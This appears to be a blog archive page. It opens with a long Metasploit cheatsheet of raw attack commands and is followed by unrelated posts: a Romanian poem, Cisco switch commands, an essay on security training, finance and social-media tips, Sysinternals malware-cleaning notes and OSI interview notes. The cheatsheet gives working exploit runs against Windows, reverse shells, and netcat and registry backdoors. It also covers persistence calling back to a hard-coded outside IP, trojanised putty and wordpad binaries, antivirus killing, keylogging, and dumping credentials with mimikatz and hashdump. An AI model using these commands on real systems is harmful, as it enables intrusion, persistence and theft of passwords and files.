Tuesday, June 28, 2022

METASPLOIT CHEATSHEET

 

METASPLOIT CHEATSHEET


Commands Only (Not for Script Kiddies):

1Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1
set payload windows/vncinject/bind_tcp
exploit


2.Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.1.10 
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell


3. Hacking By Metasploit . Windows xp Sp3 . With B14CK_B34RD
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.10
set RHOST 192.168.1.1
set payload windows/meterpreter/reverse_tcp
exploit


4.hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.10
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192.168.1.1
set RPORT 4321
show options
exploit


5. Metasploit --- Explotando vulnerabilidad en Windows 7
sudo nmap 192.168.---cek target dengan nmap------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1
set RPORT 445
run ----run the exploit


6. Metasploit backdooring
msf3#./msfpayloa windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R |./msfconsole -t
exe -x /tmp/kislay.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
root@b14ck# cd /tmp---->kislay.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
show options
exploit

Meterpretr>
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen


7. ms10 025 metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.1
exploit


8. IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/---enter
wait a few moments...


9. metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1
set LHOST 192.168.1.10
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir


10.Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555


11. BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer


12. ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\

MORE Advanced Phun:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

____________________________________________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf


use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

________________________________________________________________________

# shows all the scripts
run [tab]

________________________________________________________________________

# persistence! broken ...if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30

________________________________________________________________________

run get_pidgin_creds

idletime
sysinfo

________________________________________________________________________

# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell

________________________________________________________________________

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"

________________________________________________________________________

# escalate to system
use priv
getsystem

________________________________________________________________________

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

________________________________________________________________________

# list top used apps
run prefetchtool -x 20
________________________________________________________________________
# list installed apps
run prefetchtool -p
________________________________________________________________________
run get_local_subnets
________________________________________________________________________
# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
________________________________________________________________________
# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
________________________________________________________________________
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
________________________________________________________________________

# does some run wmic commands etc
run winenum
________________________________________________________________________


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
________________________________________________________________________
# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
________________________________________________________________________
# vnc / port fwd for linux
run vnc
________________________________________________________________________
# priv esc
run kitrap0d

________________________________________________________________________

run getgui
________________________________________________________________________
# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock
_________________________________________________________________________
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

__________________________________________________________________________


getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
___________________________________________________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
___________________________________________________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
___________________________________________________________________________
getuid



enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

________________________________________________________________________
# Windows Login Brute Force Meterpreter Script
run winbf -h
________________________________________________________________________
# upload a script or executable and run it
uploadexec

________________________________________________________________________
# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011

_________________________________________________________________________

# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
__________________________________________________________________________

email me@ pris@tyrellcorp.net

Monday, June 27, 2022

Decebal catre popor

 5 noiembrie 2012

Cosbuc: Viata asta-i bun pierdut
Când n-o traiesti cum ai fi vrut!
Si-acum ar vrea un neam calau
S-arunce jug în gâtul tau:
E rau destul ca ne-am nascut,
Mai vrem si-al doilea rau?

Din zei de-am fi scoborâtori,
C-o moarte tot suntem datori!
Totuna e dac-ai murit
Flacau ori mos îngârbovit;
Dar nu-i totuna leu sa mori
Ori câine-nlantuit.

Cei ce se lupta murmurând,
De s-ar lupta si-n primul rând,
Ei tot atât de buni ne par
Ca orisicare las fugar!
Murmurul, azi si orisicând,
E plânset în zadar!

Iar a tacea si lasii stiu!
Toti mortii tac! Dar cine-i viu
Sa râda! Bunii râd si cad!
Sa râdem, dar, viteaz rasad,
Sa fie-un hohotit si-un chiu
Din ceruri pâna-n iad!

De-ar curge sângele pârau,
Nebiruit e bratul tau
Când mortii-n fata nu tresari!
Si însuti tie-un zeu îti pari
Când râzi de ce se tem mai rau
Dusmanii tai cei tari.

Ei sunt romani! Si ce mai sunt?
Nu ei, ci de-ar veni Cel-sfânt,
Zamolxe, c-un întreg popor
De zei, i-am întreba: ce vor?
Si nu le-am da nici lor pamânt
Caci ei au cerul lor!

Si-acum, barbati, un fier si-un scut!
E rau destul ca ne-am nascut:
Dar cui i-e frica de razboi
E liber de-a pleca napoi,
Iar cine-i vânzator vândut
Sa iasa dintre noi!

Eu nu mai am nimic de spus!
Voi bratele jurând le-ati pus
Pe scut! Puterea este-n voi
Si-n zei! Dar va gânditi, eroi,
Ca zeii sunt departe, sus,
Dusmanii lânga noi!

Decebal catre popor

OSCP PWK privilege escalation commands

execute -H -i -c -m -d calc.exe -f "c:\\Mcafee\\mimikatz.exe" -a ‘”sekurlsa::logonPasswords full” exit’

msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -x wordpad.exe -k -f exe -o wordpad1.exe

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.2.7 LPORT=443 -f exe -o iexplore.exe

sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"

sc config upnphost binpath= "C:\McAfee\iexplore.exe -e C:\WINDOWS\System32\cmd.exe"


accesschk.exe /accepteula -uwcqv "Authenticated Users" *

Another tweak to the runas technique is to use a powershell one liner so the user gets a prompt with a known signed exe rather than an unknown yellow warning prompt.

sc config upnphost binpath= "C:\McAfee\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\spoolsv.exe"

msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' D > /root/Desktop/evil.dll

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -f dll -o evil.dll

Daily useful CISCO commands

show running-config interface gigabitEthernet 2/0/14

show mac address-table interface gigabitEthernet 2/0/14

show mac address-table address 0014.6a7c.c2b8

show interfaces gigabitEthernet 2/0/14

#########
US-2960XR-STACK#show interfaces gigabitEthernet 2/0/14 switchport
Name: Gi2/0/14
Switchport: Enabled
Administrative Mode: static access
Operational Mode: static access
Administrative Trunking Encapsulation: dot1q
Operational Trunking Encapsulation: native
Negotiation of Trunking: Off
Access Mode VLAN: 12 (MG)
Trunking Native Mode VLAN: 1 (default)
Administrative Native VLAN tagging: enabled
Voice VLAN: 248 (SA-VOIP)
Administrative private-vlan host-association: none
Administrative private-vlan mapping: none
Administrative private-vlan trunk native VLAN: none
Administrative private-vlan trunk Native VLAN tagging: enabled
Administrative private-vlan trunk encapsulation: dot1q
Administrative private-vlan trunk normal VLANs: none
Administrative private-vlan trunk associations: none
Administrative private-vlan trunk mappings: none
Operational private-vlan: none
Trunking VLANs Enabled: ALL
Pruning VLANs Enabled: 2-1001
Capture Mode Disabled
Capture VLANs Allowed: ALL

Protected: false
Unknown unicast blocked: disabled
Unknown multicast blocked: disabled
Appliance trust: none
########

US-2960XR-STACK#show interfaces gigabitEthernet 2/0/14 status

Port      Name               Status       Vlan       Duplex  Speed Type
Gi2/0/14  MG-cell     connected    12         a-full a-1000 10/100/1000BaseTX

#######

US-2960XR-STACK#show interfaces description

######## Unused Cisco Ports Lake Forest ##############

show int | i proto.*notconnect|proto.*administratively down|Last in.* [6-9]w|Last in.*[0-9][0-9]w|[0-9]y|disabled|Last input never, output never, output hang never

Last input never, output never, output hang never
  Last input 45w1d, output 00:00:00, output hang never
  Last input 50w3d, output 00:00:00, output hang never
GigabitEthernet1/0/30 is down, line protocol is down (notconnect)
  Last input never, output 10w5d, output hang never
GigabitEthernet1/0/32 is down, line protocol is down (notconnect)
  Last input 11w2d, output 3d04h, output hang never
GigabitEthernet1/0/34 is down, line protocol is down (notconnect)
GigabitEthernet1/0/35 is administratively down, line protocol is down (disabled)
  Last input never, output never, output hang never
GigabitEthernet1/0/42 is down, line protocol is down (notconnect)
  Last input never, output never, output hang never
GigabitEthernet1/0/44 is down, line protocol is down (notconnect)
  Last input 22w3d, output 22w0d, output hang never
GigabitEthernet1/0/45 is down, line protocol is down (notconnect)
  Last input never, output never, output hang never
GigabitEthernet1/0/47 is down, line protocol is down (notconnect)
  Last input 22w3d, output 22w0d, output hang never







Why MOST cybersecurity training doesn't work!

 Why Most Cyber Security Training Doesn't Work

There’s been a lot of debate lately about whether or not cyber security training is worth the investment. To engage in this debate, it is important that all parties have a common definition of cyber security training. If we define cyber security training as the act of herding people into a classroom once a year (or upon hire) to sit through the boring, antiquated style of training session that emerged 15-20 years ago, then I would have to agree, don’t bother with the investment. There are studies which prove this style of training doesn’t work.

Unfortunately, as the rest of the cyber security industry has evolved, the basics of cyber security training have pretty much stayed the same. I have actually seen people using the same annual PowerPoint training material for 7+ years. This outdated model of training will not help defend a company against evolving cyber-attacks. But I have also seen companies achieve quantifiable results with new models of cyber security training that employ interactive software modules and games to engage users, coupled with simulated attacks to assess them.

I think it is more accurate to say that security professionals know that traditional training isn’t working, but they have not found other options. They either aren’t willing to invest the time to update the content, or aren’t willing to invest money to change the training methods.

Why does most cyber security training fail today?

1)      It’s boring;

2)      It lacks user interaction and involvement;

3)      There’s no measurement;

4)      We scare versus teach;

5)      Education is not a security team’s core competency.

However, based on our work with customers and extensive scientific research, security training does yield measurable results. Let’s review in more detail why traditional training fails and how to approach it differently:

Make it engaging -- Traditional cyber security training is boring, out of context, and way too long! With today’s attention deficient society, training has to evolve to be successful in reducing the threats for an organization. Many of today’s training methods are not compelling to users and many times the content is so overwhelming that companies lose users a few minutes into the training session. They’ll doze off, start checking their smart phone or politely zone out while looking attentive.

New methods of effective training canprovide users with practical advice in a topically focused software-based training session that takes less than 10 minutes.

Involve the user -- In addition to being boring, there is limited chance for users to interact and actually practice what they learn. Now, I’m not talking about a quiz. Quizzes don’t teach, they test. Answering quiz questions out of context shouldn’t be confused with practice. Practice helps users put concepts to use, so they learn the right behaviors. We all know the scenario: You start the video at your desk, and then go about doing your other day-to-day business. At the end of the video, you guess your way through a few questions, hit enter and hope for the best. If you’re a good guesser…voila!... you get your shiny new certificate of completion, and the security team can put a check mark on their annual objectives . But was anything learned?

Instead, cutting-edge training deploys interactive techniques where users are asked to practice concepts as they learn them, thereby engaging the user and enforcing learning as they go. For example, employees can complete their session by making decisions in a variety of security scenarios to apply what they’ve just learned, thereby increasing learning retention.

Measure success -- If you don’t measure, how do you know if you are being successful? What valuable data did you collect in the process? Was it actionable? The goal of security training has been to “check the box,” whether for an audit, compliance reasons or to show to your managers that you are doing your job. Successful training needs to be measured and provide actionable data about the strengths and weaknesses in your organization. Anything less is a waste of time.

Effective training collects user interaction and data throughout the training to give security professionals intelligence on an individual employee, as well as aggregate strengths and weaknesses in their organization. This data also helps to show improved knowledge over time.

Enlighten, don’t scare -- For some reason, we have come to believe that we need to scare people to get them to act differently. The problem is that by scaring workers we are actually impacting their ability to get their jobs done. They become afraid to open emails, to access systems and to do their daily jobs. Yes, training needs to break through, but paralyzing an organization in fear is counter-productive. Instead, good training has the potential to empower employees to take full advantage of the Internet’s benefits, while protecting themselves and their employers from potential security breaches.

Use learning science principles -- If you are a hacker, are you automatically an effective teacher? If you know the technology and all of its weaknesses, then it seems reasonable that you should be able to teach the same information to employees, right? Possibly, but not likely. If you ask a bunch of hackers whether training is working, what answer do you expect to get? Everyone has strengths and weaknesses, but generally hackers don’t make good educators and technologists are better off making technology decisions.

If companies want to see results with cyber security training, a shift in mindset is required. The science of learning dates back to the early 1950s, and its techniques have been proven over time and adopted as accepted learning principles. Applied to information security training, these techniques can provide immediate, tangible, long-term results in educating employees and improving your company's overall security posture. Let’s conduct training based on how people actually learn versus treating training as a check-box activity, and we’ll see just how valuable an investment in security training can be.

In the words of Einstein, “Insanity is doing the same thing over and over again and expecting different results.” Thankfully, when it comes to cyber security training it’s possible to stay sane by embracing the advances in security training which are available today.

How to Turn Social Media into a business?

 Turn Social Media into a business?

1) Progression
2) Your goal is Steady growth, not fast growth!
3) Become a storyteller
4) Vlogging (video blogging) (to tell a story)

###########

7 Social media platforms:
1. Instagram (just highlights of events)
2. YouTube (long form)
3. Snapchat (the new TV, least trash talking)
4. Facebook (all of the marketing at once) (not as cool anymore, but it's a scrolling tool and a mix of everything) (great ad platform, data company)
5. Podcast (it's a radio, hands/eye free while playing something)
6. Twitter (chatter, trash, news, fun)
7. Live streaming (virtual reality, the most interactive with lots of comments)
8. The 'Wild card' is email lists (old school and powerful)

###########


Richest man in Babylon

 The Richest Man in Bablyon has 7 basic principles:

1) Start thy purse to fattening - save/invest
2) Control thy expenditures - watch out for self serving brokers
3) Make thy gold mutiply - use powerful investments
4) Guard thy treasures from loss - watch out for brokers with their hot tips.
5) Make of thy dwelling a profitable investment - rental properties, your own home---but stay within your means.
6) Insure a future income - do work that you love to do. Become excellent at it.
7) Increase thy ability to earn - education never stops. Keep reading good books like this one, The Millionaire Next Door, Rich Dad Poor Dad and so on.

Sysinternals Malware Analysis notes

 by Mark Russinovich (for more details, please see the YouTube video presentation)

NOTE: do not let the notes below be a substituTe for the YouTube video, as the notes below include no screenshots of the tools used!
Also, I haven't checked if there's an update to the information below, so if anyone thinks of it as obsolete, I apologize!

#######

Learn about the SysInternals tools and techniques for analyzing and cleaning malware
- professional antimalware analysis requires years of deep training
- even for professionals, Sysinternals tools can prove useful

Analyzing:
- understanding the impact of malware
- can be used to understand malware operation
- generates road map for cleaning infestations

Cleaning:
- removing an infestation of a compromised system
- attempting a clean can also reveal more information about the malware's operation

Pave&Nuking a system, should be the last and most extreme alternative!
If there's no expertise and time left, to understand/analyze the malware, then pave&nuke the system!

Malware cleaning steps:
- disconnect from network
- identify malicious process and drivers
- terminate identified processes
- identify and delete malware autostarts
- delete malware files
- reboot and repeat

What are you looking for when you identify/investigate processes:
- it has no icon
- it has no description or company name
- unsigned Microsoft images
- live in Windows directory or user profile
- are packed
- include strange URLs in their strings
- have open TCP/IP endpoints
- host suspicious DLLs or services

How many people look at processes with Task Manager?
Use Process Explorer (from Sysinternals)!
Process Explorer:
- is the Super Task Manager
- has lots of general troubleshooting capabilities:
    - DLL versioning problems
    - handle leaks and locked files
    - performance troubleshooting
    - hung processes
- we're going to focus on its malware cleaning capabilities

The Process View:
- the process tree shows parent-child relationships
- icon, description and company name are pulled from image version information
    - most malware doesn't have version information
    - what about malware pretending to be from Microsoft? Will talk later
- Use the Window Finder (in the toolbar) to associate a window with its own process
- use the Search Online menu entry to lookup unknown processes
    - but malware often uses totally random and pseudo-random names


Refresh Highlighting:
- refresh highlighting highlights changes
    - Red: process exited
    - Green: new process
- change duration (default 1 second) in Options
- press space bar to pause and F5 to refresh
- cause display to scroll to make new processes visible with Show New Processes option
- we'll see how to spot short-lived processes later

Process-type Highlights:
- blue processes are running in the same security context as Process Explorer
- pink processes host Windows services
- purple highlighting indicates an image is 'packed'
    - packed can mean compressed or encrypted
    - malware commonly uses packing (ex: UPX) to make antivirus signature matching       more difficult
    - packing and encryption also hides strings from view
- there are a few other colors, but they are not important for malware hunting

Tooltips:
- process tooltips show the full path to the process image
- malware more often hides behind Svchost, Rundll32 and Dllhost
    - tooltip for Rundll32 processes shows hosted DLL
    - Dllhost tooltip shows hosted COM server
    - tooltip for service processes shows hosted services
        - services covered in detail shortly

New in v15.2:
- autostart locations
    - reports where image is registered for autostart or loading
    - not necessarily what caused for process to execute, though
- process timeline

Detailed Process Information:
- double-click on a process to see detailed information
- pages relevant to malware analysis:
    - image: signing status, start time, version
    - TCP/IP: open endpoints
    - strings: printable strings in main executable

Image Verification:
- all (well, most) Microsoft code is digitally signed
    - hash of file is signed with Microsoft's private key
    - signature is checked by decrypting signed hash with the public key
- you can selectively check for signatures with the Verify button on the process image tab
    - select the Verify Image Signatures option to check all
    - add the Verified Signer column to see all
- note that verification will connect to the Internet to check Certificate Revocation List (CRL) servers

Sigcheck and ListDLLs:
- scan the system for suspicious executable images
    sigcheck -e -u -s c:\       (it will discover great places to hide malware)
- look for same characteristics as suspicious processes
    - be especially wary of items in the \Windows directory and the \Users          \<username>\AppData directories
    - investigate all unsigned images
- ListDLLs will can running processes for unsigned DLLs
    listdlls -u

Strings:
- on-disk and in-memory process strings are visible on the Strings tab
    - there's only a difference if the image is compressed or encrypted
- Strings can help provide clues about unknown processes
    - look for URLs, names and debug strings
- you can also dump strings with the command-line String utility from Sysinternals
    strings <file>

The DLL View:
- malware can hide as a DLL inside a legitimate process
    - we've already seen this with Rundll32 and Svchost
    - typically loads via an autostart
    - can load through 'dll injection'
    - packing highlist shows in DLL view as well
- open the DLL view by clicking on the DLL icon in the toolbar
    - shows more than just loaded DLLs
    - included .exe and any 'memory mapped files'
- can search for a DLL with the Find dialog
- DLL strings are also viewable on the DLL properties

Terminating Malicious Processes:
- don't kill processes
    - malware processes are ofter restarted by watchdogs
- instead, suspend them
    - note that this thing might cause a system hang for Svchost processes
    - record the full path to each malicious EXE and DLL
- after they are all asleep then kill them
    - watch for restarts with new names

Investigating Autostarts:
- Windows msconfig.exe falls short when it comes to identifying autostarting   applications
    - it knows about few locations
    - it provides little information
- it uses the Task Manager (which is REALLY bad)

Autoruns:
- shows every place in the system that can be configured to run something at boot &     logon
    - standard Run keys and Startup folders
    - shell, userinit
    - services and drivers
    - tasks
    - winlogon notifications
    - Explorer and IE addins (toolbars, Browser Helper Objects...)
    - More and ever growing
- each startup category has its own tab and all items display on the Everything tab
    - startup name, image description, company and path

Identifying Malware Autostarts:
- zoom-in on add-ons (including malware) by selecting these filter options:
    - verify code signatures
    - hide Microsoft entries
- select an item to see more in the lower window
    - online search unknown images
    - double-click on an item to look at where its configured in the Registry or       file system
- has other features
    - can display other profiles
    - can also show empty locations (informational only)    
    - includes compare functionality
    - includes equivalent command-line version, Autorunsc.exe

Deleting Autostarts:
- delete suspicious autostarts
    - you can disable them if you're not sure
- after you're done do a full refresh
- if they come back, run Process Monitor to see who's putting them back
    - you might have misidentified a malware process
    - it might be a hidden, system or legitimate process

Tracing Malware:
- tracing activity can reveal the system impact of malware
    - malware shows initial infection, before cloaking is applied
    - can reveal the internals of 'buddy system' and other infection-protection       mechanisms
- Process Monitor makes tracing easy
    - a simple filter can identify all system notifications
    - investigating stacks can distinguish legimitate activity from malicious       activity


Event Properties:
- event details
    - duration, process, thread, details, etc
- process information
    - command line
    - user
    - session and logon session
    - image information    
    - start time
- thread stack at time of event

Filtering:
- to filter on a value, right-click on the line and select the attribute from the   Include, Exclude and Highlight submenus
    - you can select multiple values simultaneously
- when you set a highlight filter you can move through highlighted event properties

Advanced Filtering:
- multiple-filter behaviour:
    - values from different attributes are AND'd
    - values from the same attributes are OR'd
- more complex filtering is available in the Filter dialog
    - Outlook-style rule definition
- you can save and restore filters
- filter for watching malware impact: "Category is Write"

The Process Tree:
- Tools-Process Tree
    - shows all processes that have been seen in the trace (including parents)
    - can toggle on and off terminated processes
- the process tree provides an easy way to see process relationships
    - short lives processes
    - command line
    - user names


Real World Analysis and Cleaning (minute 44)

The Case of the SysInternals - Blocking Malware
- friend asked user to take a look at system suspected of being infected with malware
    - boot and logons took a long time
    - Microsoft Security Essentials (MSE) malware scan would never complete
    - nothing jumped out in Task Manager
- tried running Sysinternal tools, but all exited immediately after starting:
    - Autoruns
    - Process Monitor
    - Process Explorer
    - Even Notepad opening a text file named "Process Explorer" would also terminate

- Looking through Sysinternals suite, noticed Desktops utility
    - hoped malware might not be smart enough to monitor additional desktops

- Sure enough, was able to launch Process Monitor and other tools:
    - Malware probably looks for tools in window titles
    - Window enumeration only returns windows of current desktop

- Nothing suspicious in Process Explorer
- Next, ran Process Monitor
    - noticed a lot of Winlogon activity, so set a filter to include it
    - could see a once-per-second check of a strange key
        (e.g acdcacaeaaacb...)
    - saw name of random DLL in the key:
        (e.g Yellow folder named acdcacaeaaacb...)

Solved:
- tried deleting the key, but after refreshing, it was back
- went back to MSE and directed it to scan just the random DLL image file on disk
- after clean, was able to delete Registry key and system was back to normal: problem solved...

Cleaning FakeSysDef Scareware:

- see video in regards to the malware hiding

The case of the Strange Reboots:
- laptop would reboot immediately after connecting to wireless networks:
    - followed by a boot in safe mode
    - then boot back to normal mode
- boot to safe mode resulted in automatic logoff
- tried to run Microsoft Security Essentials (MSE), but it was damaged
- ran Process Explorer and saw many processes exhibiting malware characteristics
- processes with names mimicking Windows processes were clearly malicious
- Autoruns showed system massively infected
- suspended all packed processes that looked suspicious
- connected to network: no restart
- downloaded and ran fresh copy of MSE
    - MSE detected several malware variants
- after clearning, there were no more suspicious processes and the system behaved normally:
PROBLEM SOLVED!

Cleaning Cycbot.exe backdoor:

- please see video for details
- also do some research on how it works and locations it uses

Analyzing and Cleaning Stuxnet and Flame:
- discovered June 2010 after it had spread for a year
- exploited 4 zero day Windows vulnerabilities
    - print spooler for remote code execution
    - shell link Explorer code execution from infected key
    - Win2k/Windows XP Win32k.sys privilege elevation
    - Windows 7 Task Scheduler privilege elevation
- Drivers signed by certificates stolen from RealTek and JMicron (in Taiwan)
- Rootkit code for Siemens Step 7 SCADA PLC for centrifuges
- suspected to have targeted Iranian centrifuges used for Uranium enrichment at Natanz nuclear facility
    - Iran confirms in September 2010 that thousands were destroyed
    - suspected to be created by Israel and US
- believed to have been spreading through USB keys (at this point)
- there is ONLY ONE lsass.exe on the system (should be anyway)

Flame:
- discovered a few weeks ago
- considered by some to be more sophisticated than Stuxnet
- found by Kaspersky antivirus
- used LUA programming for the code
- the computer clock had to be changed to Tehran


The Future of Malware:
- we've seen the trends:    
    - malware that pretends to be from Microsoft or other legitimate companies
    - malware protected by sophisticated rootkits
    - malware that has stolen certificates
- cleaning is going to get much, much harder:
    - targeted and polymorphic malware won't get AV/AS signatures
    - malware can directly manipulate Windows structures to cause misdirection
    - all standard tools will be directly attacked by malware
    - there will be more un-cleanable malware
- you can't know you're infected unless you find a symptom

Zero Day - A Novel
- a cyberthriller true to the science
- www.zerodaythebook.com
- book: trojan a novel horse (Mark Russinovich)

The end :)

How to know your stuff in Info Sec and IT

 - Explain TCP/IP and mention its layers.
- Explain layer 2 of the OSI model.
Data Link layer—Layer 2 is known as the Data Link layer. The Data Link layer is responsible for formatting and organizing the data before sending it to the Physical layer. The Data Link layer organizes the data into frames. A frame is a logical structure in which data can be placed; it's a packet on the wire. When a frame reaches the target device, the Data Link layer is responsible for stripping off the data frame and passing the data packet up to the Network layer. The Data Link layer is made up of two sub layers, including the logical link control layer (LLC) and the media access control layer (MAC). You might be familiar with the MAC layer, as it shares its name with the MAC addressing scheme. These 6-byte (48-bit) addresses are used to uniquely identify each device on the local network. A major security concern of the Data Link layer is the Address Resolution Protocol (ARP) process. ARP is used to resolve known Network layer addresses to unknown MAC addresses. ARP is a trusting protocol and, as such, can be used by hackers for APR poisoning, which can allow them access to traffic on switches they should not have.

- Explain layer 3 of the OSI model.
Network layer—Layer 3 is known as the Network layer. This layer is concerned with logical addressing and routing. The Network layer is the home of the Internet Protocol (IP), which makes a best effort at delivery of datagrams from their source to their destination. Security concerns at the network level include route poisoning, DoS, spoofing, and fragmentation attacks. Fragmentation attacks occur when hackers manipulate datagram fragments to overlap in such a way to crash the victim's computer. IPSec is a key security service that is available at this layer.
- Difference between TCP and UDP.
